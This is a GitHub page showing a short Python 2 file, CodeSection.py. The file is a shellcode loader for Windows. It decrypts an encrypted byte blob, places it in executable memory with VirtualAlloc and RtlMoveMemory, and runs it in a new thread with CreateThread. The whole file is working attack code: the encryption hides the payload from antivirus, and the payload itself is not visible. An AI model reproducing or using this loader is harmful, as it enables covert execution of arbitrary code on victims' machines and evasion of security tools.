-
Notifications
You must be signed in to change notification settings - Fork 13
/
CodeSection.py
30 lines (22 loc) · 2 KB
/
CodeSection.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import ctypes, crypt
def run():
shellcode = "\x2a\xe1\xc7\x37\xb4\x87\x99\xc2\xf9\xc4\x01\xd9\x97\x1b\x12\xf4\x04\xb5\xe4\x3b\x8e\xc3\xeb\x7b\x4e\xe0\x47\xa5\x90\x71\xf3\x51\xa5\x4b\x33\x05\x94\x1d\x2b\xba\x3c\x54\xfd\x65\xd4\x01\xfb\xa8\x52\x09\xb1\x30\x75\xf0\x98\x41\xd2\xc3\x7b\x93\xcb\x13\xe7\xa3\x89\xd8\x1e\xd2\xf8\x5c\xcd\xc4\x77\xb1\x95\x68\xbb\x3f\xd2\x52\xa4\xc5\x1f\x00\xa5\x42\x0d\xe5\x82\x18\x94\xfd\x92\xca\x68\xfe\x5a\x08\xe4\x39\x78\x01\xbe\x92\x33\x09\x5a\x38\x81\x06\x51\x3d\x32\xba\xa6\x9c\x77\x77\xe4\xb0\x0d\x2f\x92\xe2\xf3\x32\x8d\xbe\xcf\x27\x80\xfa\xd6\x19\x54\xe1\xdc\xcf\x29\xde\xb6\x78\x32\x12\xc6\x83\xc9\xb3\xb7\x3d\x34\xfb\xea\x75\x56\xd3\xc3\x7a\x3b\x1d\x80\xd0\x02\xd7\x47\x41\xf1\xbb\xa0\xc6\xf7\x17\x08\x0f\x75\xa6\xf0\xb3\xa7\x1d\xab\x57\xd8\xfe\x2d\x78\xdc\xad\x5e\x5f\xd9\x71\xf5\x4c\xee\x52\x53\x75\xf1\xe8\x3d\xde\x26\x01\x1e\x0c\x79\x9c\x85\x28\x9e\x35\x58\x80\xd4\xd3\xd8\x6d\x14\x37\x72\xe5\x80\xea\xff\x6b\x37\xf5\x38\x87\x66\x19\xd8\x5c\x83\xa7\x7c\x6f\x9a\xc3"
shellcode = crypt.decrypt(shellcode)
print "Running shellcode..."
shellcode = bytearray(shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
run()